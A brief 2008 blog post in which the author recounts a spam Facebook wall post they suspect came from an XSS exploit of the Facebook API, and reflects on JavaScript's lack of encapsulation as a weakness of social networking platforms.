Facebook and XSS – a sample in action! :P

By chrt00 at 9:16 pm on March 6, 2008 | 2 Comments

Today, I checked Facebook and got a spam wall post. I suspected it was an FB API + XSS exploit and looked into this matter. What a coincidence with the new project! =P

my wall!

So after the first Google result I get a complete rundown on how to XSS exploit someone’s account.


turns out it is fairly simple to execute!

This shows how even some of the most trusted sites where we share a lot of information can be manipulated to do malicious things. This is one of the real weaknesses of social networking and a open applications API, as javascript works across a whole page without private/public members that we are accustomed to in traditional OOP.

Filed under: Current Events2 Comments »